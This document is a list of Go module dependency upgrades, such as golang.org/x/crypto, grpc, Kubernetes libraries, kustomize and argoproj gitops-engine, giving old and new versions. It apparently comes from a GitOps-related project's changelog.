github.com/Azure/azure-sdk-for-go/sdk/azidentity	v1.10.1 -> v1.11.0
github.com/Azure/azure-sdk-for-go/sdk/internal	v1.11.1 -> v1.11.2
github.com/argoproj/gitops-engine	v0.7.1-0.20250617174952-093aef0dad58 -> v0.7.1-0.20260512161450-ff8d2f5207dc
github.com/bmatcuk/doublestar/v4	v4.8.1 -> v4.9.1
github.com/casbin/casbin/v2	v2.107.0 -> v2.123.0
github.com/casbin/govaluate	v1.7.0 -> v1.10.0
github.com/fxamacker/cbor/v2	v2.8.0 -> v2.9.0
github.com/golang-jwt/jwt/v5	v5.2.2 -> v5.3.0
github.com/google/gnostic-models	v0.6.9 -> v0.7.0
github.com/moby/spdystream	v0.5.0 -> v0.5.1
github.com/modern-go/reflect2	v1.0.2 -> v1.0.3-0.20250322232337-35a7c28c31ee
github.com/spf13/cobra	v1.9.1 -> v1.10.1
github.com/spf13/pflag	v1.0.7 -> v1.0.10
go.opentelemetry.io/otel	v1.36.0 -> v1.38.0
go.opentelemetry.io/otel/trace	v1.36.0 -> v1.38.0
golang.org/x/crypto	v0.41.0 -> v0.46.0
golang.org/x/net	v0.43.0 -> v0.47.0
golang.org/x/oauth2	v0.30.0 -> v0.31.0
golang.org/x/sync	v0.16.0 -> v0.19.0
golang.org/x/sys	v0.35.0 -> v0.39.0
golang.org/x/term	v0.34.0 -> v0.38.0
golang.org/x/text	v0.28.0 -> v0.32.0
golang.org/x/time	v0.12.0 -> v0.13.0
golang.org/x/tools	v0.36.0 -> v0.39.0
google.golang.org/genproto/googleapis/rpc	v0.0.0-20250519155744-55703ea1f237 -> v0.0.0-20250825161204-c5933d9347a5
google.golang.org/grpc	v1.73.0 -> v1.75.1
google.golang.org/protobuf	v1.36.8 -> v1.36.9
k8s.io/apiextensions-apiserver	v0.33.4 -> v0.34.0
k8s.io/apiserver	v0.33.1 -> v0.34.0
k8s.io/cli-runtime	v0.33.1 -> v0.34.0
k8s.io/component-base	v0.33.1 -> v0.34.0
k8s.io/component-helpers	v0.33.1 -> v0.34.0
k8s.io/controller-manager	v0.33.1 -> v0.34.0
k8s.io/kube-aggregator	v0.33.1 -> v0.34.0
k8s.io/kube-openapi	v0.0.0-20250610211856-8b98d1ed966a -> v0.0.0-20250710124328-f3f2b991d03b
k8s.io/kubernetes	v1.33.1 -> v1.34.2
sigs.k8s.io/kustomize/api	v0.19.0 -> v0.20.1
sigs.k8s.io/kustomize/kyaml	v0.19.0 -> v0.20.1